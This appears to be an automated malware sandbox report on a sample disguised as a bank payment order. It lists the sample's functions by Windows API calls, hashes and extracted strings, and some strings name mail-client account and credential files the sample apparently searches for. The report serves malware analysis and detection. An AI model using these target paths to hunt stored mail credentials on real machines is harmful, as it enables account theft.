• Opcode ID: e2cfd11bc430893589e6fb0dd8a51cd0c36ed037e82ee5f8c984086a2a97847c
• Instruction ID: 2ca4496f1a14d18b161ef3d64c4edf84b84b785272aa1eaa0a4cb80950281d6e
• Opcode Fuzzy Hash: e2cfd11bc430893589e6fb0dd8a51cd0c36ed037e82ee5f8c984086a2a97847c
• Instruction Fuzzy Hash: D621D370500700AFD7107F71AE49B1B3AA8AF40705F40443EFA82B62E2EF7C49458B6E

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt$h#9/
• API String ID: 3527080286-635473644
• Opcode ID: 995b8fa76e8879ba2b6ee86e1ec2d896e2e69dff60c360d5c8767d8e4120a38a
• Instruction ID: 840a12054744d806b862402e4d2bfc9f1baa5dbb18c884b6ac86a54fda141303
• Opcode Fuzzy Hash: 995b8fa76e8879ba2b6ee86e1ec2d896e2e69dff60c360d5c8767d8e4120a38a
• Instruction Fuzzy Hash: D9518EB5E00609CBEB01AFA4EA4519C7FB8FF49210F594A89D480A6364CF75DA26CB19

Control-flow Graph

APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 34F41D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,?,00000000,?,?,00000000), ref: 34F41D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34F41D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34F41D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34F41D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34F41D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 34F41D8A
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• String ID:
• API String ID: 1454806937-0
• Opcode ID: beecedb6f9eafaf375f294aa3f6d19722950b575def379939408ad8068abc718
• Instruction ID: d685d0b9fbdb12bc73af459987c261ee232e4da5d96f7fecf38b77abfa2a1fad
• Opcode Fuzzy Hash: beecedb6f9eafaf375f294aa3f6d19722950b575def379939408ad8068abc718
• Instruction Fuzzy Hash: 5C2171B190121CAFE7109BA4ED8CEEA7BBCEF18344F090965F501E3240DE749E478AB4

Control-flow Graph (graph rendering not reproduced; see the APIs list below for the calls it covers)

APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,34F49C07,?,00000000,?,00000000,00000000), ref: 34F494D4
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 34F49590
• WriteFile.KERNEL32(?,?,00000000,34F49C07,00000000,?,?,?,?,?,?,?,?,?,34F49C07,?), ref: 34F495AF
• WriteFile.KERNEL32(?,?,00000001,34F49C07,00000000,?,?,?,?,?,?,?,?,?,34F49C07,?), ref: 34F495E8
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleMultiWide
• String ID: h#9/
• API String ID: 977765425-176419635
• Opcode ID: 433d8b431e0ae08a2ad17321ca601d8de36d55b7eff1cc16ee60cc9f935e18be
• Instruction ID: 022982ca8ad05a219c3c732688733c39df32bc8908a17021e3bfc526fc2a8314
• Opcode Fuzzy Hash: 433d8b431e0ae08a2ad17321ca601d8de36d55b7eff1cc16ee60cc9f935e18be
• Instruction Fuzzy Hash: CE5182B5A042059FDB10CFA8D895E9EBBF8EF09300F18455AE555E7385EA309942CF60

Control-flow Graph (graph rendering not reproduced; the function wraps LoadLibraryExW / FreeLibrary / GetLastError around the api-ms- and ext-ms- string checks listed below)

Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID:
• String ID: api-ms-$ext-ms-
• API String ID: 0-537541572
• Opcode ID: 8f2885e79622582015909112e0c8df762ca8dd148c0e0506cdf4fd5f64118074
• Instruction ID: adf688e1c7e2502e9a5bb23a15cba2192112791187ac92aef005e77379f18a7f
• Opcode Fuzzy Hash: 8f2885e79622582015909112e0c8df762ca8dd148c0e0506cdf4fd5f64118074
• Instruction Fuzzy Hash: A511967BB41321ABE7119A68DC84A1A3F589F11BA0F9D0914E955A73C0EF30D903CAD2

Control-flow Graph (graph rendering not reproduced; see the APIs list below for the calls it covers)

APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,34F44AEA,?,?,34F44A8A,?,34F52238,?,34F44BBD,00000000,00000000), ref: 34F44B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 34F44B6C
• FreeLibrary.KERNEL32(00000000,?,?,?,34F44AEA,?,?,34F44A8A,?,34F52238,?,34F44BBD,00000000,00000000,00000001,34F42082), ref: 34F44B8F
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll$h#9/
• API String ID: 4061214504-3673377281
• Opcode ID: baf827640e20a56b0ce9aa091247dfe2fd6ac44bde3c4ba6f1aa7b26d3282a09
• Instruction ID: 2163c97ad56153c2483bf123f8c7c7068f3beec2f11332b08f2a93f4802b61ee
• Opcode Fuzzy Hash: baf827640e20a56b0ce9aa091247dfe2fd6ac44bde3c4ba6f1aa7b26d3282a09
• Instruction Fuzzy Hash: 2EF03C75A00208ABDB119B94EC08B9DBFB9EF54251F4945A8E805B6350DF309943CA95

Control-flow Graph (graph rendering not reproduced; see the APIs list below for the calls it covers)

APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
• wsprintfW.USER32 ref: 0040661B
• LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040662F
Strings
Memory Dump Source
• Source File: 00000001.00000002.7792667737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.7792636395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.7792707770.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.7792742913.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.7792818028.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME$\
• API String ID: 2200240437-1946221925
• Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
• Instruction ID: 20a568d0c0fc1602bd6380e0cb5a56c4d8b7367864d21650c92abf75bc562668
• Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
• Instruction Fuzzy Hash: E5F0F670500219AADB14AB64ED0DF9B366CAB00304F10447AA646F11D1EBB8DA24CBA8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 34F41038
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 34F4104B
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 34F41061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 34F41075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 34F41090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 34F410B8
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0
APIs
  • Part of subcall function 34F41E89: lstrlenW.KERNEL32(?,?,?,?,?,34F410DF,?,?,?,00000000), ref: 34F41E9A
  • Part of subcall function 34F41E89: lstrcatW.KERNEL32(?,?,?,34F410DF,?,?,?,00000000), ref: 34F41EAC
  • Part of subcall function 34F41E89: lstrlenW.KERNEL32(?,?,34F410DF,?,?,?,00000000), ref: 34F41EB3
  • Part of subcall function 34F41E89: lstrlenW.KERNEL32(?,?,34F410DF,?,?,?,00000000), ref: 34F41EC8
  • Part of subcall function 34F41E89: lstrcatW.KERNEL32(?,34F410DF,?,34F410DF,?,?,?,00000000), ref: 34F41ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 34F4122A
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: lstrlen$lstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• API String ID: 1475205934-1520055953
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,0040332B,007B5800,76943420,0040359C,?,00000006,?,0000000A), ref: 00406556
• CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 00406565
• CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,0040332B,007B5800,76943420,0040359C,?,00000006,?,0000000A), ref: 0040656A
• CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,0040332B,007B5800,76943420,0040359C,?,00000006,?,0000000A), ref: 0040657D
Strings
Memory Dump Source
• Source File: 00000001.00000002.7792667737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.7792636395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.7792707770.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.7792742913.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.7792818028.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
APIs
• lstrlenW.KERNEL32(?,?,?,?,?,34F410DF,?,?,?,00000000), ref: 34F41E9A
• lstrcatW.KERNEL32(?,?,?,34F410DF,?,?,?,00000000), ref: 34F41EAC
• lstrlenW.KERNEL32(?,?,34F410DF,?,?,?,00000000), ref: 34F41EB3
• lstrlenW.KERNEL32(?,?,34F410DF,?,?,?,00000000), ref: 34F41EC8
• lstrcatW.KERNEL32(?,34F410DF,?,34F410DF,?,?,?,00000000), ref: 34F41ED3
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,34F46FFD,00000000,?,?,?,34F48A72,?,?,00000100), ref: 34F4887B
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,34F48A72,?,?,00000100,5EFC4D8B,?,?), ref: 34F48901
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 34F489FB
  • Part of subcall function 34F456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 34F45702
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeap
• String ID: h#9/
• API String ID: 2584219951-176419635
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,34F46FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 34F48731
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 34F487BA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 34F487CC
  • Part of subcall function 34F456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 34F45702
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType
• String ID: h#9/
• API String ID: 1699317483-176419635
                                                                                                                                                                                                                                          • Opcode ID: 4b6205bd16d94903d5f6ffca1db1e4b0f0beba14c64be3a30ffa87449a7dbbc7
                                                                                                                                                                                                                                          • Instruction ID: ff191773c96fa04036f62fd4b04afd0e36a66d9e3f1fee8ec15e89ec50e40dd6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b6205bd16d94903d5f6ffca1db1e4b0f0beba14c64be3a30ffa87449a7dbbc7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A319D7AA0021AAFEB158F65DC90DAF7FA5EB44350F090628EC059B290EF35D952CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,34F49C54,?,00000000,?), ref: 34F499A8
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,34F49C54,?,00000000,?,00000000,00000000,?,00000000), ref: 34F499D6
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,34F49C54,?,00000000,?,00000000,00000000,?,00000000), ref: 34F49A07
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                          • String ID: h#9/
                                                                                                                                                                                                                                          • API String ID: 2456169464-176419635
                                                                                                                                                                                                                                          • Opcode ID: 98a1f2cd290fcc0671df3481e48f62a3fe2683374711adf3279f941533988dca
                                                                                                                                                                                                                                          • Instruction ID: fa1e5e988d1f33e99a354e9898b18d79c0f1fe7d8c994e45b1a9a53c18973753
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98a1f2cd290fcc0671df3481e48f62a3fe2683374711adf3279f941533988dca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D3145757002199FDB14CF69DC919EAB7B9EF48344F0548ADE509D7390DA30AD82CF61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,34F4190E,?,?,00000000,?,00000000), ref: 34F41643
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,34F4190E,?,?,00000000,?,00000000,?,?,?,?), ref: 34F4165A
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,34F4190E,?,?,00000000,?,00000000,?,?,?,?,?), ref: 34F41661
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00001008,?,?,?,?,?,34F4190E,?,?,00000000,?,00000000,?,?,?,?), ref: 34F41686
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrcatlstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1475610065-0
                                                                                                                                                                                                                                          • Opcode ID: df1b96f3212ce6853129ab22017153c792a4578ef14a36619dd6b985c7652738
                                                                                                                                                                                                                                          • Instruction ID: bd161e38f8d72723c4decafb29c186415a724f98eb90ee17107f22fe705049f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df1b96f3212ce6853129ab22017153c792a4578ef14a36619dd6b985c7652738
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5821DA36900204EFDB05DB55EC85EEE7BB8EF88714F18445AEA04BB345DF34A94387A9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 34F4715C
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 34F4717F
                                                                                                                                                                                                                                            • Part of subcall function 34F456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 34F45702
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 34F471A5
                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 34F471C7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1794362364-0
                                                                                                                                                                                                                                          • Opcode ID: 2aa78ca7138873515a4f22e4ea7041ad738749b4ed286c490c2387b1876427a7
                                                                                                                                                                                                                                          • Instruction ID: c567c5f3a45dfc0ff7c3f0a8f0c6ead7983a0010209e9ef44a5c428b7da0e79a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2aa78ca7138873515a4f22e4ea7041ad738749b4ed286c490c2387b1876427a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C0184B6605215BF27111ABAAC88D7B7EADDEC6AA0369092DBD04D7304EE608C0381F4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,34F41D66,00000000,00000000,?,34F45C88,34F41D66,00000000,00000000,00000000,?,34F45E85,00000006,FlsSetValue), ref: 34F45D13
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,34F45C88,34F41D66,00000000,00000000,00000000,?,34F45E85,00000006,FlsSetValue,34F4E190,FlsSetValue,00000000,00000364,?,34F45BC8), ref: 34F45D1F
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,34F45C88,34F41D66,00000000,00000000,00000000,?,34F45E85,00000006,FlsSetValue,34F4E190,FlsSetValue,00000000), ref: 34F45D2D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                          • Opcode ID: 739d14645c032398ed896632b6bab650ad5c88a07adc4bbaee73b5c1c8bd9e18
                                                                                                                                                                                                                                          • Instruction ID: c45023ca2b65f605f0dfb1533d17e41257e9142d45901090db7563922f5a400f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 739d14645c032398ed896632b6bab650ad5c88a07adc4bbaee73b5c1c8bd9e18
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4601D8377093266BD3516A68EC48A567B6CEF157E1B190A24FB05E7344DF20D403CAD4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: h#9/
                                                                                                                                                                                                                                          • API String ID: 0-176419635
                                                                                                                                                                                                                                          • Opcode ID: c35fe5f0a230758ac5f0280fee7a5b12682d4fc7d1d71953c77426f859448e54
                                                                                                                                                                                                                                          • Instruction ID: e354a938ed4a346a7107a9aba584cef1ff2ea04f78500e7339e940d821bdb89a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c35fe5f0a230758ac5f0280fee7a5b12682d4fc7d1d71953c77426f859448e54
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98513DB5B0820AAEFB118FB8C844EAE7FB8AF45314F480959E504A7390DE759943CF61
APIs
• Part of subcall function 34F469F3: GetOEMCP.KERNEL32(00000000,?,?,34F46C7C,?), ref: 34F46A1E
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,34F46CC1,?,00000000), ref: 34F46E94
• GetCPInfo.KERNEL32(00000000,34F46CC1,?,?,?,34F46CC1,?,00000000), ref: 34F46EA7
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID: h#9/
• API String ID: 546120528-176419635
• Opcode ID: 9d43ef179f7477d1110594984b12adaa5047ba188399b92dc8a963bf22446332
• Instruction ID: 0f895286e6eec68bae33d83c5d7a513b5ede432eaa089d27c1d1a7a7e4c1c25c
• Opcode Fuzzy Hash: 9d43ef179f7477d1110594984b12adaa5047ba188399b92dc8a963bf22446332
• Instruction Fuzzy Hash: 9E5103B5A043459EFB148F65C8806AABFE5EF41224F0C486ED0858B761EF3DD647CBA0
APIs
• GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 34F46AF0
Strings
Memory Dump Source
• Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
• Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Info
• String ID: $h#9/
• API String ID: 1807457897-2385237740
• Opcode ID: 58499653772f32e636872f4fae67078d4c9497e3427435d5c94fc30da4937e0e
• Instruction ID: 923feb0c476730e40489de0473b8f690d9f08bdb81ec1176167a6779cb276a63
• Opcode Fuzzy Hash: 58499653772f32e636872f4fae67078d4c9497e3427435d5c94fc30da4937e0e
• Instruction Fuzzy Hash: D6411C7550434C9FFB218F14CC84AE6BFADEB55708F1808EDD58986252DA399947CF20
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,34F49C44,?,00000000,?,00000000,00000000), ref: 34F498B1
• GetLastError.KERNEL32(?,34F49C44,?,00000000,?,00000000,00000000,?,00000000), ref: 34F498DA
Strings
Memory Dump Source
